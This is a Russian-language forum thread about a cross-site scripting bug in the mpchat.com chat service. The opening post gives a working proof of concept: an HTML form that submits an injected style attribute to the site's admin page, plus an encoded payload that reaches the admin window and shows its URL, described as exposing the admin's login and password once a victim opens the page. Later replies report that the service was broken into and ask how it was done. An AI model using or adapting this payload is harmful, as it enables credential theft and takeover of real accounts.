этот баг позволяет собрать страницу, которая (после открытия ее жертвой) уводит логин и пароль админа (если была открыта админка) или уводит логин и идентификатор пользователя в чате
код для теста xss
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank">
<textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br>
<input type="submit">
</form>[/QUOTE]<span id='postcolor'>
если зайти в админку
и открыть страницу с выше указаным кодом
потом заменить в поле alert() на
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%2 7administration%27)%3Balert(z.document.location)%3 B%22%3E/))[/QUOTE]<span id='postcolor'>
и послать форму
то в новом окне откроется страница c xss иньекцией, которая обратится в окно с именем administration (а именно в нем и открывается админка) и покажет url (а в нем логин и пароль)
Ну вы ребят даёте, такие сложные комбинации чтобы взломать пароль администратора, необходимо заманить его на этот код, помоему так хоть что можно взломать зная структуру, а пароль он всеравно себе вернёт, можно конечно попробовать и только немного напакостить
Эт сново я,
похоже всёже ктоко круто поломал мпчата, но так и неизвестно кто.
По форуму сервиса видно что сам антиадмин.ру заходил и поломал там пару чатов различным способами.
Но вроде и ещё ктото приходил и уложил весь сервак на 2 недели в сон
Вообщем щас там востановительные работы.
Короче кто что знает по этому поводу напишите как ломается